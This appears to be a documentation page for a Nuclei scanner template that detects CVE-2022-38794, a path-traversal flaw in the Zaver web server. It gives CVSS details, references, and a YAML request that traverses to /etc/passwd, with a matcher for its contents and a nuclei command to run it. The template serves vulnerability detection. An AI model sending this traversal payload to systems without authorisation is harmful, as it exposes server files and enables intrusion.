Zaver - Local File Inclusion
ID: CVE-2022-38794
Severity: high
Author: pikpikcu
Tags: cve,cve2022,lfi,zaver,zaver_project
Description
Section titled “Description”Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.
YAML Source
Section titled “YAML Source”id: CVE-2022-38794
info: name: Zaver - Local File Inclusion author: pikpikcu severity: high description: | Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring. impact: | This vulnerability can lead to unauthorized access, data leakage, and remote code execution. remediation: | To remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations. reference: - https://github.com/zyearn/zaver/issues/22 - https://nvd.nist.gov/vuln/detail/CVE-2022-38794 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-38794 cwe-id: CWE-22 epss-score: 0.00913 epss-percentile: 0.82805 cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zaver_project product: zaver tags: cve,cve2022,lfi,zaver,zaver_project
http: - method: GET path: - '{{BaseURL}}/../../../../../../../../etc/passwd'
matchers-condition: and matchers: - type: regex part: body regex: - "root:[x*]:0:0"
- type: status status: - 200# digest: 4a0a00473045022005057f362cfa893d6e35a9062a3eeb16184f2f8404d1681bcdd9cd94b067e78b022100bdeccd0bde6f35cdcee181e1a341a8531b393d944897674dca74b2323b5d5cab:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-38794.yaml"